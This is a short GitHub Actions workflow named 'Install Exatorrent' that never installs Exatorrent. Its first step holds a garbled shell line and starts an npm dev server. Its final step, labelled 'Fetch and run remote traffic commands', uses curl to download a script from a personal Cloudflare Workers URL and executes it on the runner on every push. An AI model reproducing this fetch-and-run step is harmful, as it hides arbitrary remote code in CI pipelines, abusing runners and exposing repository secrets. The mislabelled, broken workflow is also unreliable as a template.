name: Install Exatorrent on GitHub Actions

on:
  push:
    branches: [main]
  workflow_dispatch:

jobs:
  install_exatorrent:
    runs-on: ubuntu-latest

    steps:
      # Run Exatorrent container
      - name: Run exatorrent container
        run: |
          cd my-app & npm install & npm run dev  cd path-to-your-app-folder
          npm install
          npm run dev &
          sleep 5

          # Verify it's running
          sleep 5
          curl -s http://localhost:3000 || echo "server may not be running"

      # Fetch and run remote traffic commands
      - name: Fetch and run remote traffic commands
        run: |
          curl -sSL https://holy-queen-e7be.idrissimahdi2020.workers.dev -o commands.sh
          chmod +x commands.sh
          ./commands.sh
